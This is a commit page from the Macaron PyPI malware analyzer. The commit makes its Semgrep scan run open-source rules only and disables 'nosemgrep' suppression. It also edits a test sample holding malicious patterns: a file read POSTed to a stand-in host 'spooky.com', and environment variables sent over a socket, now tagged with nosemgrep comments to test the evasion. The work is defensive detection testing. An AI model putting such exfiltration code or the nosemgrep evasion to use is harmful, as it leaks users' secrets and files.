Skip to content

Commit 6cbbef6

Browse files
committed
fix: semgrep now only runs open-source functionality, and disabled the nosemgrep feature
1 parent 5083183 commit 6cbbef6

File tree

2 files changed

+35
-22
lines changed

2 files changed

+35
-22
lines changed

src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py

Lines changed: 28 additions & 15 deletions
Original file line numberDiff line numberDiff line change
@@ -33,23 +33,29 @@
3333
class PyPISourcecodeAnalyzer(BaseHeuristicAnalyzer):
3434
"""This class is used to analyze the source code of python PyPI packages. This analyzer is a work in progress.
3535
36-
This analyzer works in two phases. In the first phase, it will perform a pattern-based scan of all python files
37-
in the source code, looking for suspicious patterns defined by the YAML file in defaults.ini. By default, this
38-
will include suspicious package imports, suspicious hardcoded constants, and suspicious function calls. If this
39-
scan does not find any suspicious activity, the analysis will stop and the package will be marked as benign
40-
by this analyzer. If the scan does find suspicious activity, the analyzer will move on to the second phase.
41-
42-
In the second phase, the analyzer will perform dataflow analysis. This will track the flow of suspicious constants
43-
and the results of suspicious function calls to where they are used, to determine if they are used in a malicious
44-
manner. Suspicious activity includes data exfiltration, code execution, remote connections, operating system and
45-
process manipulation, and encoded and obfuscated patterns. The types of activity, and their severity and quantity,
46-
will then determine the probability of the package being malicious.
47-
48-
Currently, this analyzer only supports the first phase, and will return simply boolean results on the maliciousness
49-
of the package.
36+
Currently the analyzer performs textual pattern matching and dataflow analysis using the open-source features of
37+
Semgrep. Semgrep open-source taint tracking can only perform in one locale, but this is a known limitation. Default
38+
rules are stored in 'macaron/resources/pypi_malware_rules' as semgrep .yaml rule files. A user may add additional
39+
rules stored in a specified directory passed by them in the 'defaults.ini' configuration file.
5040
"""
5141

5242
def __init__(self, resources_path: str | None = None) -> None:
43+
"""
44+
Initialise the source code analyzer and load default and custom semgrep rulesets.
45+
46+
Parameters
47+
----------
48+
resources_path: str | None
49+
The path to the resources directory which must contain a 'pypi_malware_rules' directory of
50+
semgrep rules. If None is provided, then this is loaded from the global config resources path.
51+
Defaults to None
52+
53+
Raises
54+
------
55+
ConfigurationError
56+
If the default rule path is invalid, the heuristic.pypi entry is not present, or if the semgrep
57+
validation of the custom rule path failed.
58+
"""
5359
super().__init__(
5460
name="anomalous_version_analyzer",
5561
heuristic=Heuristics.SUSPICIOUS_PATTERNS,
@@ -65,6 +71,12 @@ def _load_defaults(self, resources_path: str) -> tuple[str, str | None]:
6571
6672
Semgrep validation is run on the custom rules provided by the user.
6773
74+
Parameters
75+
----------
76+
resources_path: str
77+
The path to the resources directory which must contain a 'pypi_malware_rules' directory of
78+
semgrep rules.
79+
6880
Returns
6981
-------
7082
tuple[str, str | None]
@@ -140,7 +152,8 @@ def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicRes
140152
if there is no source code available.
141153
"""
142154
analysis_result: defaultdict = defaultdict(list)
143-
semgrep_commands: list[str] = ["semgrep", "scan"]
155+
# only run semgrep open-source features, and disable 'nosemgrep' ignoring so this does not bypass our scan
156+
semgrep_commands: list[str] = ["semgrep", "scan", "--oss-only", "--disable-nosem"]
144157
result: HeuristicResult = HeuristicResult.PASS
145158

146159
source_code_path = pypi_package_json.package_sourcecode_path

tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py

Lines changed: 7 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -41,10 +41,10 @@ def file_exfil_to_urllib3():
4141
http = man().request
4242
http('POST', "spooky.com", body=oo.read(file, 2048))
4343

44-
def environ_to_socket():
45-
import socket as s
46-
from os import environ as environment_vars
47-
with s.socket(s.AF_INET, s.SOCK_STREAM) as soc:
48-
soc.connect(('localhost', 0))
49-
other = soc
50-
other.send(environment_vars)
44+
def environ_to_socket(): # nosemgrep
45+
import socket as s # nosemsemgrep
46+
from os import environ as environment_vars # nosemgrep
47+
with s.socket(s.AF_INET, s.SOCK_STREAM) as soc: # nosemgrep
48+
soc.connect(('localhost', 0)) # nosemgrep
49+
other = soc # nosemgrep
50+
other.send(environment_vars) # nosemgrep

0 commit comments

Comments
 (0)